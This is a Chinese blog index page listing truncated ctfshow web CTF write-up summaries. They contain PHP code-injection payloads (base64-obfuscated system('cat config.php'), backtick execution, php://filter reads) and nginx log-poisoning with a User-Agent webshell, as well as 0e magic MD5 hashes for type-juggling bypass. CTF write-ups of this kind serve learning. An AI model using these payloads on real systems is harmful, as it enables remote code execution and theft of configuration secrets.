上一页 1 ··· 4 5 6 7 8 9 10 下一页
摘要: ctfshow web5 对于PHP 会把0e开头的解析成科学技术法 为0 常见的0E开头的MD50e开头的md5和原值:QNKCDZO0e8304004519934940580242199033912406107080e462097431906509019562988736854s87892619 阅读全文
posted @ 2021-04-10 13:39 C10ud 阅读(53) 评论(0) 推荐(0) 编辑
摘要: ctfshow web4 日志包含漏洞 useragent中写入一句话木马 菜刀连接得到flag 不要这样把 shell写到ua头的后面 要插入到ua头中 阅读全文
posted @ 2021-04-09 20:39 C10ud 阅读(50) 评论(0) 推荐(0) 编辑
摘要: ctfshow web3 php伪协议+文件包含漏洞 php:// 伪协议是用来 访问各个输入/输出流 php://input个可以访问请求的原始数据的只读流 也就是说获取post数据 其他伪协议这两个博客 ctf中php伪协议的利用 ctf中伪协议的利用 ?url=php://input bp 得 阅读全文
posted @ 2021-04-09 11:50 C10ud 阅读(50) 评论(0) 推荐(0) 编辑
摘要: 过滤掉php文件字 考虑为日志包含 掏出家伙扫 是nginx服务器 那就知道了日志目录了 nginx的日志文件默认地址在/var/log/nginx/access.log和/var/log/nginx/error.log, 访问access.log之后 看来是记录了get请求和user-agent 阅读全文
posted @ 2021-04-09 09:19 C10ud 阅读(41) 评论(0) 推荐(0) 编辑
摘要: ctfshow web萌新16 直接get传参得到flag 阅读全文
posted @ 2021-04-09 08:03 C10ud 阅读(36) 评论(0) 推荐(0) 编辑
摘要: ctfshow web14 15萌新 用post传参可以绕过过滤 ?c=echo `$_POST[a]`?>再post传参 a=cat config.php 或者php伪协议 ?c=include $_GET[a]?>&a=php://filter/read=convert.base64-encod 阅读全文
posted @ 2021-04-01 19:19 C10ud 阅读(37) 评论(0) 推荐(0) 编辑
摘要: ctfshow web13 萌新 直接copy大佬wp 总结精炼 这次的过滤中增加了分号这样我们就只能执行一条语句了,在eval()中的是php语句,分号禁了,我们只能用 ?>来闭合语句了,这里再提下assert()assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适 阅读全文
posted @ 2021-03-31 15:32 C10ud 阅读(50) 评论(0) 推荐(0) 编辑
摘要: ctf show 萌新web12 文件名也被过滤掉 base64绕过 构造paylaod ?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b); 得到flag 或者是 对于反引号 在Linux中 阅读全文
posted @ 2021-03-31 15:22 C10ud 阅读(53) 评论(0) 推荐(0) 编辑
摘要: ctfshow 萌新web11 又增加了cat的绕过 这个payload依然可用 ?c=$file_handle = fopen("config.php","r");if ($file_handle){while (!feof($file_handle)) { $line = fgets($file 阅读全文
posted @ 2021-03-31 14:33 C10ud 阅读(52) 评论(0) 推荐(0) 编辑
摘要: ctf show 萌新 web10 把这几个执行系统命令的函数给禁掉了 那考虑不用系统命令读取并展示文件内容 用多行PHP代码试一试 整理后构造payload ?c=$file_handle = fopen("config.php","r");if ($file_handle){while (!fe 阅读全文
posted @ 2021-03-30 22:43 C10ud 阅读(46) 评论(0) 推荐(0) 编辑
上一页 1 ··· 4 5 6 7 8 9 10 下一页